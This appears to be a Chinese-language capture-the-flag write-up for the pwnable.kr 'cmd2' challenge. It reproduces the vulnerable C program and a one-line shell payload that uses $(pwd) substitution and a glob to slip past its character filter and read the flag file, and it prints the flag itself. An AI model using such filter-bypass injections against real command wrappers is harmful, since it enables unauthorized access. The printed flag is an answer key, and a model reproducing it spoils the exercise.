0%

pwnable.kr —— cmd2

question#

1
2
3
4
5
Daddy bought me a system command shell.
but he put some filters to prevent me from playing with it without his permission...
but I wanna play anytime I want!

ssh cmd2@pwnable.kr -p2222 (pw:flag of cmd1)

题目要求我们使用ssh登录到服务器上ssh cmd2@pwnable.kr -p2222,密码是cmd1的flag,有的时候可能有身份的校验,这个时候需要加上参数-o StrictHostKeyChecking=no进行登录

cmd2.c#

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
#include <stdio.h>
#include <string.h>

int filter(char* cmd){
int r=0;
r += strstr(cmd, "=")!=0;
r += strstr(cmd, "PATH")!=0;
r += strstr(cmd, "export")!=0;
r += strstr(cmd, "/")!=0;
r += strstr(cmd, "`")!=0;
r += strstr(cmd, "flag")!=0;
return r;
}

extern char** environ;
void delete_env(){
char** p;
for(p=environ; *p; p++) memset(*p, 0, strlen(*p));
}

int main(int argc, char* argv[], char** envp){
delete_env();
putenv("PATH=/no_command_execution_until_you_become_a_hacker");
if(filter(argv[1])) return 0;
printf("%s\n", argv[1]);
system( argv[1] );
return 0;
}

analyse#

相对于cmd1,加强了过滤规则,主要是其中/的问题
可以在目录下使用pwd构造

其余的无差

get flag#

1
2
3
cmd2@ubuntu:/$ /home/cmd2/cmd2 '$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)f*'
$(pwd)bin$(pwd)cat $(pwd)home$(pwd)cmd2$(pwd)f*
FuN_w1th_5h3ll_v4riabl3s_haha

flagFuN_w1th_5h3ll_v4riabl3s_haha

坚持原创技术分享,您的支持将鼓励我继续创作!